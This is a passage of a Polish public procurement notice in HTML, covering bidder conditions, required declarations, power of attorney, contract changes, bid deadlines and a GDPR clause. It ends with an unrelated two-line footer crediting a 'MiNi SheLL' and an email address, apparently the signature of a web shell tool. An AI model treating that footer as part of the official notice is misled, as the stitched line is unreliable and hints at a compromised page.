spełnia / nie<br/>spełnia.<br/>7.1.2. spełniają warunki udziału w postępowaniu w zakresie:<br/>a) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku.<br/>c) sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku.<br/>d) zdolności technicznej lub zawodowej:<br/>Zamawiający nie określa warunku.<br/><br/>7.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do<br/>zawarcia umowy w sprawie zamówienia publicznego. Uwaga: spółka cywilna jest traktowana jako Wykonawcy ubiegający<br/>się wspólnie. Przed udzieleniem zamówienia Zamawiający uprawniony jest do żądania przedłożenia zawartej umowy regulującej zasady współpracy wykonawców wspólnie składających ofertę (tj. umowę konsorcjum, umowę spółki cywilnej).<br/>7.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 7.1.1<br/>SWZ składa osobno każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia osobno każdego z<br/>Wykonawców oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>7.4. Zamawiający dopuszcza powierzenie zamówienia podwykonawcom Wykonawcy. W takim wypadku Wykonawca,<br/>zgodnie z art. 462 ust. 2 Ustawy p.z.p., ma obowiązek wskazania w Ofercie części zamówienia, których wykonanie zamierza<br/>powierzyć podwykonawcom oraz podania nazw ewentualnych podwykonawców, o ile są znani.<br/>7.5. Jeżeli zmiana podwykonawcy albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca<br/>powoływał się, na zasadach określonych w art. 118 ust. 1 Ustawy p.z.p., w celu wykazania spełniania warunków udziału w<br/>postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub<br/>Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca<br/>powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>7.6. Zgodnie z art. 462 ust. 5 Ustawy p.z.p. Zamawiający będzie badał czy wobec podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby nie zachodzą podstawy wykluczenia, o których mowa art. 108 i art. 109 ust. 1 pkt 4 Ustawy p.z.p.<br/>Wykonawca na żądanie Zamawiającego przedstawi oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy p.z.p. i/lub<br/>podmiotowe środki dowodowe dot. tego podwykonawcy.<br/>7.7. Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego zachodzą okoliczności wskazane w art. 7<br/>ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">.1.<br/>Wykonawca, w celu wstępnego potwierdzenia, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu,<br/>obowiązany jest załączyć do oferty, aktualne na dzień składania oferty, oświadczenie składane na podstawie art. 125 ust. 1 Ustawy<br/>p.z.p, według wzoru stanowiącego Załącznik nr 3 do SWZ, potwierdzające, iż:<br/>a) spełnia warunki udziału w postępowaniu;<br/>b) nie podlega wykluczeniu z postępowania.<br/>8.2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 8.1. stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>8.3. Zamawiający wzywa wykonawców, którzy spełniają warunki udziału w postępowaniu, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu<br/>lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>8.4. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>8.4.1. odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>8.5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o<br/>których mowa w pkt 8.4.1., składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa<br/>powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/>8.6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt<br/>8.4.1, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem<br/>osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym<br/>albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>Wykonawcy.<br/>8.7. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>8.7.1. może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu Ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p dane<br/>umożliwiające dostęp do tych środków;<br/>8.7.2. podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w<br/>art. 125 ust. 1. p.z.p.;<br/>8.7.3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.1. Oferta winna być złożona jako wypełniony i podpisany formularz „Oferta Wykonawcy” z wykorzystaniem wzoru<br/>stanowiącego Załącznik nr 1 do SWZ a treść złożonej oferty musi odpowiadać treści SWZ.<br/>13.2. Do oferty winny być dołączone wypełniony i podpisane formularze z wykorzystaniem wzorów stanowiących załączniki<br/>do SWZ, to jest:<br/>a) oświadczenie/oświadczenia składane na podstawie art. 125 ust. 1 Ustawy p.z.p. według wzoru stanowiącego Załącznik nr<br/>3 do SWZ;<br/>b) gdy Wykonawca działa przez pełnomocnika – pełnomocnictwo.<br/>Zgodnie z przepisem art. 99 § 1 Kodeksu cywilnego, pełnomocnictwo do dokonania czynności prawnej – złożenia oferty,<br/>która na mocy przepisu art. 61 ust. 1 Ustawy p.z.p. musi być sporządzona pod rygorem nieważności w postaci<br/>elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym lub podpisem osobistym – powinno być udzielone w tej<br/>samej formie. W takim przypadku pełnomocnictwo należy złożyć w oryginale w postaci dokumentu elektronicznego. W<br/>przypadku, gdy szczególna forma pełnomocnictwa nie jest wymagana (nie obejmuje swoim zakresem uprawnienia do<br/>dokonywania czynności prawnych w postępowaniu, dla których wymagana jest szczególna forma elektroniczna), może ono<br/>zostać złożone w oryginale w postaci dokumentu elektronicznego albo elektronicznej kopii poświadczonej za zgodność z<br/>oryginałem przez notariusza, opatrzonej jego kwalifikowanym podpisem elektronicznym. Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich<br/>pełnomocnika. Do oferty należy załączyć pełnomocnictwo z określeniem jego zakresu. W przypadku dokonywania<br/>czynności związanych ze złożeniem wymaganych dokumentów przez osobę(y) niewymienioną w dokumencie<br/>rejestracyjnym (ewidencyjnym) Wykonawcy, do oferty należy dołączyć stosowne pełnomocnictwo w postaci elektronicznej.<br/>W przypadku, gdy zostało ono wystawione przez upoważnione podmioty jako dokument papierowy, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym. Poświadczenie zgodności cyfrowego<br/>odwzorowania pełnomocnictwa w postaci papierowej dokonuje mocodawca lub notariusz. Każdy załączany plik zawierający<br/>dokumenty, oświadczenia lub pełnomocnictwa musi być uprzednio podpisany podpisami elektronicznymi przez<br/>upoważnione osoby reprezentujące odpowiednio Wykonawcę, współkonsorcjanta, podmiot trzeci użyczający osoby lub<br/>podwykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do<br/>zawarcia umowy w sprawie zamówienia publicznego. Uwaga: spółka cywilna jest traktowana jako Wykonawcy ubiegający<br/>się wspólnie. Przed udzieleniem zamówienia Zamawiający uprawniony jest do żądania przedłożenia zawartej umowy<br/>regulującej zasady współpracy wykonawców wspólnie składających ofertę (tj. umowę konsorcjum, umowę spółki cywilnej).<br/>7.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 7.1.1<br/>SWZ składa osobno każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia osobno każdego z<br/>Wykonawców oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub kryteriów selekcji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia Umowy wymagają formy pisemnej pod rygorem nieważności, o ile w Umowie nie określono inaczej.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian Umowy, o których mowa w np. 455 ust. 1 pkt 1 Ustawy p.z.p, które mogą dotyczyć w szczególności następujących sytuacji: <br/>a)	zmiana postanowień umowy w przypadku zmiany przepisów prawnych istotnych / mających bezpośrednie znacznie dla realizacji przedmiotu umowy,<br/>b)	konieczności zmiany sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz niezbędna w celu prawidłowego wykonania Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pisf</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający wymaga, aby Wykonawca zrealizował przedmiot zamówienia w terminie 3 dni roboczych od dnia złożenia zamówienia, zaś warunki złożenia zamówienia podane są w Projektowanych postanowieniach umowy stanowiących Załącznik nr 4 do SWZ.<br/><br/>2) C.D. zapisów z 3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:<br/>.. (Dz.U.2020.2415), należy złożyć w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>11. Wyjaśnienia i uzupełnienia na wezwanie Zamawiającego, Wykonawca jest zobowiązany doręczyć Zamawiającemu przed upływem terminu wskazanego w wezwaniu do wyjaśnień lub uzupełnień w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>12. Dokumenty lub oświadczenia sporządzone w języku obcym są składane z tłumaczeniem na język polski.<br/>13. Wykonawca ma obowiązek podać Zamawiającemu swój adres poczty elektronicznej (email).<br/><br/>3) CIĄG DALSZY ZAPISÓW Z &#34;4.3.) Kryteria oceny ofert&#34;:<br/>16.2. Uzyskana punktacja w przedmiotowych kryteriach stanowić będzie sumę punktacji, liczonej wg wzoru:<br/>S = C + T + F + K<br/>16.3. Obliczenia punktacji, we wskazanych kryteriach oceny ofert, zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/>16.4. Oferta, która otrzyma największą liczbę punktów w oparciu o określone kryteria, zostanie uznana za najkorzystniejszą.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z liczbą otrzymanych punktów.<br/>16.5. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert będą przedstawiać taki<br/>sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>16.6. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną lub najniższym kosztem.<br/>16.7. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 16.6, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych<br/>zawierających nową cenę lub koszt.<br/><br/>4) C.D. zapisów z 3.15)RODO obowiązek informacyjny:<br/>.. o których mowa w art.18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego U. E. lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa UODO, gdy uznają Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy RODO;<br/>11. Nie przysługuje Państwu:<br/>a) zgodnie z art.17 ust.3 lit. b, d lub e RODO- prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Państwa danych osobowych jest art.6 ust.1 lit.c RODO;

Creat By MiNi SheLL
Email: jattceo@gmail.com